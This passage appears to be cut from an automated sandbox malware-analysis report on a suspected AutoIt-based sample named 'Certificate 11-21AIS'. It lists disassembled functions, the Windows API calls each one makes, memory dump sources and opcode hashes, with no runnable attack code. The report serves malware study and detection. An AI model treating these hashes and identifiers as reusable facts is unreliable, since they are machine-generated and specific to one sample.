                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
                                                                              • Instruction ID: 9a7fb5b715e011c9de864e31c8aa08a2d1a80a5b987b426b645d21c7a367050d
                                                                              • Opcode Fuzzy Hash: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
                                                                              • Instruction Fuzzy Hash: 2F313971D00109EBCF11EFE4CC85EEE7FB9FF58710F100019E819A6166EA31A946CBA1
                                                                              Function 0092975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0092980E
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0092984A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: 4be0e29c9c17204f5efabf2d17e3a5c40f95c244e8ed2c97fa9915f7482aa16b
                                                                              • Instruction ID: 5ef36edd2fa14e2419ed3b705e19cbe2ed3fade370121cf95673136eb2fa3bf2
                                                                              • Opcode Fuzzy Hash: 4be0e29c9c17204f5efabf2d17e3a5c40f95c244e8ed2c97fa9915f7482aa16b
                                                                              • Instruction Fuzzy Hash: EE318B71110614AEEB109F78DC81BFB73ADFF99764F04861AF8A9C7190DA31AC81DB60
                                                                              Function 00905157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009051C6
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00905201
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 6d793eba45e7360be70352d1c93070df4b89828a9bab3c7e4558648701918b13
                                                                              • Instruction ID: 45e171478450cc86d3a01cd77a04cf29c2bbc572ae88896fb56337841aa140aa
                                                                              • Opcode Fuzzy Hash: 6d793eba45e7360be70352d1c93070df4b89828a9bab3c7e4558648701918b13
                                                                              • Instruction Fuzzy Hash: 2331AE71A00604EFEB24CF9DD845BAFBBF8AF45350F150419E9A1E62E0D7709A84DF11
                                                                              Function 0091658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __snwprintf
                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                              • API String ID: 2391506597-2584243854
                                                                              • Opcode ID: 9fd4bb4c6105486203afc575ae3995a99a58fcaa0c027d8d911d5d2d2b3ce0da
                                                                              • Instruction ID: 7c7d8dfd265f55aee784f4ec616072b3811c29d11b0d47dce03caec8630090ee
                                                                              • Opcode Fuzzy Hash: 9fd4bb4c6105486203afc575ae3995a99a58fcaa0c027d8d911d5d2d2b3ce0da
                                                                              • Instruction Fuzzy Hash: 33217F31A00218AACF10EF68C881FED77B4FF55344F148459F505EB182DB70EA85CBA2
                                                                              Function 009293CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0092945C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00929467
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 55d207faa447d67de7b1c34dabcc278a0aeb5e91babd1841b38e53a9e901d310
                                                                              • Instruction ID: ed42c477274800a2a3a7b0d8c3b70a8f662f229d2b32782c6c15abc7262b4557
                                                                              • Opcode Fuzzy Hash: 55d207faa447d67de7b1c34dabcc278a0aeb5e91babd1841b38e53a9e901d310
                                                                              • Instruction Fuzzy Hash: F711B271310228BFEF15DF54EC80EBB376FEB883A4F104129F919972A4D6319C528760
                                                                              Function 009298FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                                • Part of subcall function 008DD17C: GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                                • Part of subcall function 008DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00929968
                                                                              • GetSysColor.USER32(00000012), ref: 00929982
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: a61eb54fa9993e263fbfa4d61aef50afd0c6048bdab6ddbadb5e68a659b73155
                                                                              • Instruction ID: 05a230f4479496caeeba2d68058b321da16d4a524aa24b3487c80a577791f3dd
                                                                              • Opcode Fuzzy Hash: a61eb54fa9993e263fbfa4d61aef50afd0c6048bdab6ddbadb5e68a659b73155
                                                                              • Instruction Fuzzy Hash: 72116776520219AFDB04DFB8DC45EEA7BA8FB48314F014628F956E3250E734E850DB60
                                                                              Function 00929617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00929699
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009296A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: d4de47d5bbb1b8402f04483a3bd144252324e2a27e9a2d610fd48631d35a1057
                                                                              • Instruction ID: 754741f0e72e1b4d51cf8f68fce98d8729df287d3e816afed5097c7e20ed88c4
                                                                              • Opcode Fuzzy Hash: d4de47d5bbb1b8402f04483a3bd144252324e2a27e9a2d610fd48631d35a1057
                                                                              • Instruction Fuzzy Hash: 81118C71510218ABEF209FA8EC84EEB3BAEEB05378F104714F965971E8C735DC51A760
                                                                              Function 00905262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009052D5
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009052F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 1e51ff7682921772dba52ebd512a80679fb5bcc346a21224a82f3dc23fddb838
                                                                              • Instruction ID: d242dc58eef931a81ff42944cb60ba19f2c3586af8107a6b799c571437d9113b
                                                                              • Opcode Fuzzy Hash: 1e51ff7682921772dba52ebd512a80679fb5bcc346a21224a82f3dc23fddb838
                                                                              • Instruction Fuzzy Hash: 2511DD76A01614EFEB20DA9CD905BAE77BDAB06790F160025E951E72E0D3B0AD05CFA1
                                                                              Function 00914D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00914DF5
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00914E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: bdc09dad0fa51c3d7e92772714d8816b58a1b334959672b301c71a4ace62b721
                                                                              • Instruction ID: cf8e84c3f4f9c636ba92402e8baa617c57ab0e1e04bfe84088eefbe2295a4ae8
                                                                              • Opcode Fuzzy Hash: bdc09dad0fa51c3d7e92772714d8816b58a1b334959672b301c71a4ace62b721
                                                                              • Instruction Fuzzy Hash: C711A378701229BBDF258F61D888EFBFAACFF0A755F10852AF51556180D3706981D6E0
                                                                              Function 0091A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0091A84E
                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0091A88B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: htonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 3832099526-2422070025
                                                                              • Opcode ID: 3c38c771a9d2499859b5683c68e1fccb98ef2ebee6324cdbfbae05f45d75bd12
                                                                              • Instruction ID: 6aa8b9f8c708bb50c9f59b27a1a7ca36866818d7e9d93bf141876a7cf66c9199
                                                                              • Opcode Fuzzy Hash: 3c38c771a9d2499859b5683c68e1fccb98ef2ebee6324cdbfbae05f45d75bd12
                                                                              • Instruction Fuzzy Hash: F201D279301309ABCB20DFA8C886FE9B368FF45320F10896AF6169B2D1D771EC458752
                                                                              Function 008FB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008FB7EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 86a1372e111dc7a7ab6e51480b65cb88a718b184945de5e8c69e93f003b67190
                                                                              • Instruction ID: 93cf3be03877dda9c836da506748ce3f86bbe3e8de1ea5c20e37ca808f591c7d
                                                                              • Opcode Fuzzy Hash: 86a1372e111dc7a7ab6e51480b65cb88a718b184945de5e8c69e93f003b67190
                                                                              • Instruction Fuzzy Hash: 1301B175651118ABCB04EBB8CC52EFE3379FF863A4B04061DF566E72D2EB7099088791
                                                                              Function 008FB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 008FB6EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: b21e0d814aa25ea801379a15c2724879302dab7ddf0cd8ba0b14f087d991333c
                                                                              • Instruction ID: dc1791ee6694f6c679941e582e4e9f624fc90fc914f2f0ff4f8d016cde1f40b9
                                                                              • Opcode Fuzzy Hash: b21e0d814aa25ea801379a15c2724879302dab7ddf0cd8ba0b14f087d991333c
                                                                              • Instruction Fuzzy Hash: 13014475641108ABCB04EBB8C952FFE73B9EB55344F14001DF606E31D2EB649E1897A6
                                                                              Function 008FB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 008FB76C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: d37b19ec015de605feb85cd6eb6e3aa8c973b8e449d2c1bb7832092aea176ebc
                                                                              • Instruction ID: e33fb7480b1548b9deb892b39540a91dc079bbadc8f8d52755bffadba74679a3
                                                                              • Opcode Fuzzy Hash: d37b19ec015de605feb85cd6eb6e3aa8c973b8e449d2c1bb7832092aea176ebc
                                                                              • Instruction Fuzzy Hash: 7F01A2B5641108ABCB04FBB8C902FFE73ADEF45344F140019B605F3192DB609E0987B6
                                                                              Function 00907744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: f1dbde2f5a98bf19a5c8ae3ad41b001d63ad129e7f1ca46b12a66b68539af354
                                                                              • Instruction ID: 980bb2707fd758a8828bbe1ea709332a8063093db3041c7a142c0fee9e9fc9bc
                                                                              • Opcode Fuzzy Hash: f1dbde2f5a98bf19a5c8ae3ad41b001d63ad129e7f1ca46b12a66b68539af354
                                                                              • Instruction Fuzzy Hash: 63E0D877A043242BDB10EAE9DC0AECBFBACEB91B64F014116F905D3181D670E60187D4
                                                                              Function 008FA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008FA63F
                                                                                • Part of subcall function 008E13F1: _doexit.LIBCMT ref: 008E13FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 13c49feb0218aef7ce6e47e963c3cff7be53f61636119de87926873ecba374b4
                                                                              • Instruction ID: 1e771bdf9f0c23d2a3d2e96baaedc54632543a0b8d0bd6eef1918079673089c8
                                                                              • Opcode Fuzzy Hash: 13c49feb0218aef7ce6e47e963c3cff7be53f61636119de87926873ecba374b4
                                                                              • Instruction Fuzzy Hash: BDD0C23238531832C21426AD6C0BFC4764CEB16B65F040016BB0CD56C349E6D58002DA
                                                                              Function 0093AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0093ACC0
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0093AEBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                              • String ID: WIN_XPe
                                                                              • API String ID: 510247158-3257408948
                                                                              • Opcode ID: 7ddea57537a9d932d8811d3dc4c4c6a3b124fc63df5e44c91f8b9c0cab97430e
                                                                              • Instruction ID: ab1031ec03c565b4cce6565940bc75d27429f98ae7e96a1072af6f4a37eb68ce
                                                                              • Opcode Fuzzy Hash: 7ddea57537a9d932d8811d3dc4c4c6a3b124fc63df5e44c91f8b9c0cab97430e
                                                                              • Instruction Fuzzy Hash: FCE09B78C18109DFCB11DFA5DD44DECF7BCAB48300F109081E492B2260C7744A85DF21
                                                                              Function 00928698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009286A2
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009286B5
                                                                                • Part of subcall function 00907A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 03d2588585c21d40f48a36a764d341f8389c9802a51e01d9de0d47a5593eac87
                                                                              • Instruction ID: 13e59b03278952385e0c1856b933ce17af0e50a23f21b153d521f80bba153067
